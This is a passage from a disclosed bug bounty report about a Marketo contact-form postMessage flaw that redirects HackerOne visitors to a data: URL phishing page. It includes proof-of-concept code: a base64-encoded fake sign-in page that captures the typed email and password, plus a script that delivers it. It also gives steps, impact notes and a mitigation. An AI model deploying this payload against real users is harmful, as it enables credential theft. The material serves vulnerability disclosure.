zcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayIgaHJlZj0iL2hhY2t0aXZpdHkiPkhhY2t0aXZpdHk8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Q29tcGFueTwvYT48L3NwYW4+PC9saT48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIiBocmVmPSIvdXNlcnMvc2lnbl9pbiI+VHJ5IEhhY2tlck9uZTwvYT48L3NwYW4+PC9saT48L3VsPjwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWIiPjwvZGl2PjwvZGl2PjxzcGFuPjwvc3Bhbj48L2Rpdj48ZGl2IGNsYXNzPSJmdWxsLXdpZHRoLWNvbnRhaW5lciIgc3R5bGU9InBhZGRpbmctdG9wOiAxNTBweDsiPjxkaXYgY2xhc3M9Im5hcnJvdy13cmFwcGVyIj48ZGl2Pjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJodHRwczovL2hhY2tlcm9uZS5jb20vdXNlcnMvc2lnbl9pbiIgb25zdWJtaXQ9ImFsZXJ0KCdpIGdvdCBpdDogJyArIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzaWduX2luX2VtYWlsJykudmFsdWUgKyAnOicgKyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaW5wdXQtNCcpLnZhbHVlKTsgcmV0dXJuIGZhbHNlOyIgbm92YWxpZGF0ZT0iIiBjbGFzcz0ic3BlYy1zaWduLWluLWZvcm0iPjxkaXY+PGgxIGNsYXNzPSJzZWN0aW9uLXRpdGxlIHRleHQtYWxpZ25lZC1jZW50ZXIiPlNpZ24gaW4gdG8gSGFja2VyT25lPC9oMT48ZGl2IGNsYXNzPSJuYXJyb3ctY29udGFpbmVyIj48ZGl2IGNsYXNzPSJpbnB1dC13cmFwcGVyIj48bGFiZWwgY2xhc3M9ImlucHV0LWxhYmVsIiBmb3I9InNpZ25faW5fZW1haWwiPkVtYWlsIGFkZHJlc3M8L2xhYmVsPjxpbnB1dCB0eXBlPSJlbWFpbCIgY2xhc3M9ImlucHV0IHNwZWMtc2lnbi1pbi1lbWFpbCIgbmFtZT0idXNlcltlbWFpbF0iIHZhbHVlPSIiIGlkPSJzaWduX2luX2VtYWlsIiBhdXRvY29tcGxldGU9Im9uIj48ZGl2IGNsYXNzPSJoZWxwZXItdGV4dCI+VXNpbmcgU0FNTD8gRW1haWwgYWRkcmVzcyBvbmx5LCBubyBwYXNzd29yZCBuZWVkZWQuPC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0iaW5wdXQtd3JhcHBlciI+PGxhYmVsIGNsYXNzPSJpbnB1dC1sYWJlbCIgZm9yPSJpbnB1dC00Ij5QYXNzd29yZDwvbGFiZWw+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBjbGFzcz0iaW5wdXQgc3BlYy1zaWduLWluLXBhc3N3b3JkIiBuYW1lPSJ1c2VyW3Bhc3N3b3JkXSIgdmFsdWU9IiIgaWQ9ImlucHV0LTQiIGF1dG9jb21wbGV0ZT0ib24iIG1heGxlbmd0aD0iNzIiPjwvZGl2PjxkaXYgY2xhc3M9ImlucHV0LXdyYXBwZXItc21hbGwiPjxkaXYgY2xhc3M9InJlbWVtYmVyLW1lIj48aW5wdXQgdHlwZT0iY2hlY2tib3giIGlkPSJ1c2VyX3JlbWVtYmVyX21lIiBuYW1lPSJ1c2VyW3JlbWVtYmVyX21lXSIgY2xhc3M9InNwZWMtc2lnbi1pbi1yZW1lbWJlci1tZSIgdmFsdWU9IjEiPjxsYWJlbCBmb3I9InVzZXJfcmVtZW1iZXJfbWUiPlJlbWVtYmVyIG1lIGZvciB0d28gd2Vla3M8L2xhYmVsPjwvZGl2PjxhIGhyZWY9Ii91c2Vycy9wYXNzd29yZC9uZXciIGNsYXNzPSJmb3Jnb3QtcGFzc3dvcmQiPkZvcmdvdCB5b3VyIHBhc3N3b3JkPzwvYT48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiBidXR0b24tLXN1Y2Nlc3MgaXMtZnVsbC13aWR0aCBzcGVjLXNpZ24taW4tc3VibWl0IiBuYW1lPSJjb21taXQiIHZhbHVlPSJTaWduIGluIj48L2Rpdj48ZGl2IGNsYXNzPSJuYXJyb3ctZm9vdGVyIj5ObyBhY2NvdW50IHlldD8gPGEgaHJlZj0iL3VzZXJzL3NpZ25fdXAiPkNyZWF0ZSBhbiBhY2NvdW50LjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PC9mb3JtPjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwvc3Bhbj48L2Rpdj48bm9zY3JpcHQ+PGRpdiBjbGFzcz0ianMtZGlzYWJsZWQiPkl0IGxvb2tzIGxpa2UgeW91ciBKYXZhU2NyaXB0IGlzIGRpc2FibGVkLiBUbyB1c2UgSGFja2VyT25lLCBlbmFibGUgSmF2YVNjcmlwdCBpbiB5b3VyIGJyb3dzZXIgYW5kIHJlZnJlc2ggdGhpcyBwYWdlLjwvZGl2Pjwvbm9zY3JpcHQ+PC9ib2R5Pg==","aliId":null}}}','*'); console.log('send...') }, 10); } </script> </head> <body> <a href="#" onclick="b=window.open('https://www.hackerone.com/product/response#contact','b','_blank'); doit(); return false;" target="_blank">Click me and send something</a></body> </html> It's large, but it also contains your login page. 1. User clicks on the malicious page: 2. User fills in the contact form and submits 3. User gets directly redirected to our data-page 4. If they sign in we will steal the creds: PoC-movie Here's a movie showing the scenario: Impact I'm pretty divided on the impact of this. You could argue that this is similar to opening www.hackerone.com from a page, that will on a later time redirect the user to data:, which is fully possible and probably just as sneaky. The only difference would be that this could be properly fixed and the logic of the listener in this case actually enables the attacker to fool the user related to the interaction with the site. Also, most likely a lot of other customers of Marketo are affected by this and if they lack CSP, there will be XSS:es all over the place. Also, if IE11 would support those contact-popups, it would be an XSS due to the lack of CSP-support, however now I'm getting a JS-error trying to open the contact-form... Mitigation What's interesting here though is that you can actually mitigate this easily by making sure you always use onSuccess=function(){return false} to always make sure followUpUrl won't be used. Regards, Frans 5 attachments: F320358: malicious.png F320359: contact.png F320360: sign-in.png F320361: popup.png F320362: safari-location-data.mp4 Sursa: https://hackerone.com/reports/381356